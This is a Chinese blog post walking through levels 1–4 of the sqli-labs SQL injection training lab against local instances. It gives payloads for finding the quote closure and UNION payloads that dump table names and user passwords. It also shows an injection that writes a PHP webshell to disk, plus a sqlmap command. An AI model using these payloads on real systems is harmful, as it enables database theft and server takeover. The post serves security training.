sqli-labs通关全解---sql语句闭合方式判断+1-4--2

已于 2023-01-10 15:48:08 修改
阅读量1.2k 收藏 9
点赞数 1
分类专栏: sql-labs 文章标签: sql 数据库 mysql
于 2023-01-10 15:45:26 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cyynid/article/details/128630181
版权

sql语句的闭合方式对应sql注入的类型,是进行sql注入的第一步操作,经过sqli-labs靶场的训练,加上查询网络资料,小编总结了一些常见的闭合判断方式。

这里列出一些题目中的查询语句

Less1---单引号
$id=$_GET['id'];
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
Less2---无符号
$id=$_GET['id'];
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
Less3---')
$id=$_GET['id'];
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
Less4---")
$id=$_GET['id'];
$id = '"' . $id . '"';
$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";
Less6---"
$id=$_GET['id'];
$id = '"'.$id.'"';
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
Less7---'))
$id=$_GET['id'];
$sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1";

在做题的过程中遇到的闭合符号多为以下7种
' " 无符号 ) ') ") '))

方案一:

需要靶场会对 sql语句错误信息进行回显,也是最简单的判断方式

首先尝试:

?id=1’
?id=1”

1、如果都报错,则为整形闭合。

2、如果单引号报错,双引号不报错。
然后尝试

?id=1’–+

无报错则单引号闭合。报错则单引号加括号。

3、如果单引号不报错,双引号报错。
然后尝试

?id=1"–+

无报错则双引号闭合。报错则双引号加括号。


方案二:

需要靶场对查询结果进行回显

?id=2'&&'1'='1

 如果闭合符号是’,返回结果是id=2的结果,闭合符号是'),则语句变为('2'&&'1'='1'),Mysql将2作为布尔值,返回的是id=1的结果。tip:该方案无法判断括号的个数

方案三:

使用空字符直接对sql语句进行截断,需要要求靶场允许传入空字符

?id=1';%00和id=1')%00

谁回显正常,就是谁,只有输入完全正确的时候才能正常显示,可以比较准确的判段括号个数

方案四

该方案只针对于对数字型的判断

and 1=1 和 and 1=2

当输入 and 1=1时,后台执行 Sql 语句:

select * from <表名> where id = x and 1=1

没有语法错误且逻辑判断为正确,所以返回正常。

当输入 and 1=2时,后台执行 Sql 语句:

select * from <表名> where id = x and 1=2

没有语法错误但是逻辑判断为假,所以返回错误。

sql-labs中的1-4题主要为对闭合方式的判断,可以通过以上方式,实现注入,以下 以less1为例,其他三题操作相同

Less-1-Error based-Single quotes 

判定注入点:http://127.0.0.1/sqli-labs/Less-1/?id=1 出现回显

http://127.0.0.1/sqli-labs/Less-1/?id=1%27

发现 报错注入,同时可以看出,sql语句中对回显数量进行了限制,无法直接通过万能钥匙脱库,同时通过报错信息,可以判断闭合方式为单引号

确定当前数据库

-1' union select 1,2,database()-- s(--和s之间的空格不能省略)

获得数据表的名字

-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() -- s

获得每个数据表的字段数量和名称;

-1' union select 1,COUNT(*),group_concat(column_name) from information_schema.columns where table_schema=database() -- s

获得user数据库中全部的数据

 -1' union select group_concat(id),group_concat(username),group_concat(password) from users-- s

写入webshell木马

id=-1' union select 1,2,'<?php assert($_POST[less1]);?>' into outfile 'less1.php'-- s

一般会出现问题:

The MySQL server is running with the --secure-file-priv option so it cannot execute this statement

在安装MySQL的时候限制了导入与导出的目录权限。只允许在规定的目录下才能导入。

可以通过以下命令查看secure-file-priv当前的值是什么

SHOW VARIABLES LIKE "secure_file_priv";

(1)NULL,表示禁止。

(2)如果value值有文件夹目录,则表示只允许该目录下文件(PS:测试子目录也不行)。

(3)如果为空,则表示不限制目录。

sqlmap攻击:

命令:sqlmap -u http://192.168.43.197/sqli-labs/Less-1/?id=

可以看到sqlmap检测到了bool盲注,报错注入,时间盲注和联合注入。同时提供了相应的payload,可以通过 --dbs等参数获取数据 

辰霖心
关注
  • 1
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
phpstudy+靶场sqli-labs-master下载
11-08
phpstudy+靶场sqli-labs-master下载
Sql注入漏洞测试sqli-lab(1-50)
vsdfbhsdhsdfh的博客
09-30 1392
Sql注入漏洞测试sqli-lab
SQL注入概述
MAPLE102424的博客
04-17 2704
SQL注入概述
sql-labs通关详解(1-10)
最新发布
guowu666的博客
05-02 575
sqli-labs 1-10通关详解。
SQL注入原理及如何判断闭合
m0_56235433的博客
12-10 1225
SQL注入原理及如何判断闭合
sql注入-如何判断闭合类型
2202_75361164的博客
05-28 293
b.若只有 ‘ 错误则最内层为 ’ ‘,若只有“ 错误则最内层为 ”"。(其中 ' 和 "如果有则两个只能出现其中一个且只能出现一次,即在最内层)c.若全错,则最内层为(),且如果有外围也只能是()。(自己用MySQL测的,单引号和双引号只能在括号内)a. 过滤\且没有报错,先用 ’ ,看是否错误,再用 “ ,看是否错误,最后用 ) ,看是否错误,过滤\但是没有报错,用 ' 再用 " ,看报错内容就行了。没有过滤\且报错,直接用\,看报错内容就行了。d.之后只需测外围有几层()就行了。
SQL注入-关于注入点闭合的问题(数据库MySQL
qq_36896220的博客
06-29 6437
当前正在学习渗透方面的知识,记录一下学习上面的体会。 关于怎么构造输入来让符号闭合其实一直都没怎么搞懂,也就导致了给我一个URL从一开始就不知道怎么做了,缺乏一个解题的思路。在网上也查了很多怎么找注入点的方法,基本上就告诉你一个一个的去试各种符号,从出错的信息中找,但我觉得要想有一个清楚的概念必须从根源出发。于是我在想,构造输入不就是把我写的东西写入进SQL语句中让后台数据库执行的嘛,那么我直接...
sql注入-闭合符号问题
outman23的博客
06-16 977
sql环境搭建一级目录一级目录一级目录 环境搭建 首先下载源码, 源码地址 之后下载PHPstudy或者wamp,两者都是搭建服务器的软件 我用的是PHPstudy 把源码解压到以下路径 然后进入以下路径, 打开名为“db-creds”的文件,密码改为root 最后在PHP上创建网站 注意PHP版本最好低于5.5,这里我的版本是5.2.17 一级目录 一级目录 一级目录 ...
安装sqli-labs
10-22
安装完成sqli-labs靶场环境后,可以根据关卡信息练习,结合write up(通关指南)和手工测试工具使用sqli-labs靶场环境。 总结 安装sqli-labs靶场环境可以提供一个安全和合法的环境来学习和实践Web应用安全。通过...
windows环境下安装sqli-labs
11-04
首先,我们需要下载 sqli-labs 源码,链接为 https://github.com/Audi-1/sqli-labs。然后,我们将源码解压到 web 目录下,在这里是 www 目录下。 数据库配置 接下来,我们需要配置数据库连接。在这里,我们需要...
SQL注入之如何检测与判断详细过程
01-31
SQL注入系列大纲分为: 1、检测 2、Sqlmap的使用 3、编写sqlmap的tamper 4、Fuzz过waf 5、sqlmapApi的使用 以前注入点满大街,一个单引号就可以判断出是否存在注入点。但是如今随着各大厂商越来越注重安全,各种过滤,各种waf,将注入隐藏的越来越深。那么作为白帽子,该如何判断是否存在注入! 这里附上我挖bat各大厂商时用的判断注入方法。下一期再分享如何过waf。
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
SQL注入详解
读书 买花 长大
11-12 4190
SQL-sql
SQL注入漏洞基础(三)
qq_59611876的博客
12-16 479
只要这个程序是人写的,那么一定会存在SQL注入的点。当Web应用向后台数据库传递SQL语句进行数据库操作时。如果对用户输入的参数没有经过严格的过滤处理,那么攻击者就可以构造特殊的SQL语句,直接输入数据库引擎执行,获取或修改数据库中的数据。
sql注入之时间盲注
ljj20020718的博客
11-25 309
sql注入之时间盲注
sql注入闭合方式
qq_67667368的博客
03-31 2092
由于系统没有对输入的数据进行过滤、检测,就带入到数据库中执行SQL语句,那么当用户输入一条恶意的数据,使其与原SQL语句拼接、重组得到一条恶意的SQL语句,当数据库执行这条恶意的SQL语句时,就会把数据库中的信息暴露出来,从而泄露信息。MYSQL数据库的包容性比较强,如果你输错了数据的类型,MYSQL数据库会自动将其转换成正确的数据类型,比如输入1)、1"、1-等,只要数字后面的字符不是闭合符的,数据库都会把你输入的错误的数据转换成正确的数据类型。
SQL闭合方式判断及作用
qq_41046545的博客
10-25 970
大家好,学习sql注入许久,但对其中的某些注入语句的原理和用法不慎理解,今天利用些时间将sql注入的基础复习巩固一下,希望以后学习安全的同学们能少走弯路。
SQLI—labs-master(前四关之闭合符详解)
Hala
03-30 1801
思路: 利用漏洞极多的靶场来模拟SQL注入 环境: Metasploitable2 步骤: 1.查看虚拟主机的IP 2.开启服务,可见如下的TCP端口就处于开启状态 root@metasploitable:~# nmap -p0-65535 192.168.211.132 Starting Nmap 4.53 ( http://insecure.org ) at 2020...
sqli-labs靶场练习笔记
11-09
"sqli-labs靶场练习笔记涵盖了从2关到24关的SQL注入学习内容,适合初学者参考,涉及单引号、双引号注入,布尔盲注,数据库名、表名、列名的探测,以及利用注入进行文件写入和信息获取等技能。" 在SQL注入的学习过程...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值